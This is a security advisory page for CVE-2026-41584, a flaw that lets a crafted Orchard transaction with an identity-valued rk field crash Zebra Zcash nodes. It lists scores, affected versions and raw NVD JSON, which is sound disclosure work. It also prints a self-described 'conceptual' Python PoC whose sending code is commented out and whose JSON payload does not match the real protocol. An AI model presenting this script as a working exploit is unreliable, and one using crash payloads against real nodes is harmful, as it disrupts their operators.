Security Vulnerability Report
CVE-2026-41584 CVSS 7.5 HIGH

Published: 2026-05-08 15:16:41
Last Modified: 2026-05-08 18:21:13

Description

ZEBRA is a Zcash node written entirely in Rust. Prior to zebrad version 4.3.1 and prior to zebra-chain version 6.0.2, Orchard transactions contain an rk field, which is a randomized validating key and also an elliptic curve point. The Zcash specification allows the field to be the identity (a "zero" value); however, the orchard crate, which is used to verify Orchard proofs, would panic when fed an rk with the identity value. Thus an attacker could send a crafted transaction that would make a Zebra node crash. This issue has been patched in zebrad version 4.3.1 and zebra-chain version 6.0.2.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:zfnd:zebra-chain:*:*:*:*:*:rust:*:* - VULNERABLE
cpe:2.3:a:zfnd:zebrad:*:*:*:*:*:rust:*:* - VULNERABLE
zebrad < 4.3.1
zebra-chain < 6.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket
import json

# Conceptual PoC for CVE-2026-41584
# This script simulates sending a crafted transaction to a ZEBRA node.
# The key vulnerability is the 'rk' field in Orchard transactions being set to the identity (zero).


def send_malicious_transaction(target_ip, target_port):
    # Construct a malicious transaction payload
    # Note: Real Zcash transaction construction is complex; this is a conceptual representation.
    # The critical part is setting the Orchard 'rk' field to all zeros (identity).
    malicious_tx = {
        "version": 4,
        "orchard": {
            "actions": [],
            "rk": "00" * 32  # Setting rk to identity (zero) value triggers the panic
        }
    }

    payload = json.dumps(malicious_tx).encode('utf-8')

    try:
        print(f"[*] Sending crafted transaction to {target_ip}:{target_port}...")
        # In a real scenario, this would use the Zcash P2P protocol (ZMQ or TCP)
        # sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # sock.connect((target_ip, target_port))
        # sock.sendall(payload)
        # sock.close()
        print("[+] Payload sent. If the node is vulnerable, it should crash.")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    target = "127.0.0.1"
    port = 8233
    send_malicious_transaction(target, port)
```

References

https://github.com/ZcashFoundation/zebra/security/advisories/GHSA-452v-w3gx-72wg (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41584", "sourceIdentifier": "[email protected]", "published": "2026-05-08T15:16:41.240", "lastModified": "2026-05-08T18:21:13.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ZEBRA is a Zcash node written entirely in Rust. Prior to zebrad version 4.3.1 and prior to zebra-chain version 6.0.2, Orchard transactions contain a rk field which is a randomized validating key and also an elliptic curve point. The Zcash specification allows the field to be the identity (a \"zero\" value), however, the orchard crate which is used to verify Orchard proofs would panic when fed a rk with the identity value. Thus an attacker could send a crafted transaction that would make a Zebra node crash. This issue has been patched in zebrad version 4.3.1 and zebra-chain version 6.0.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": 
"NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-617"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zfnd:zebra-chain:*:*:*:*:*:rust:*:*", "versionEndExcluding": "6.0.2", "matchCriteriaId": "6D27B49B-A5E1-4A40-BCB2-453AC6BF0150"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zfnd:zebrad:*:*:*:*:*:rust:*:*", "versionEndExcluding": "4.3.1", "matchCriteriaId": "0D5F3C05-ECFC-43B1-9168-8E114125F6B7"}]}]}], "references": [{"url": "https://github.com/ZcashFoundation/zebra/security/advisories/GHSA-452v-w3gx-72wg", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}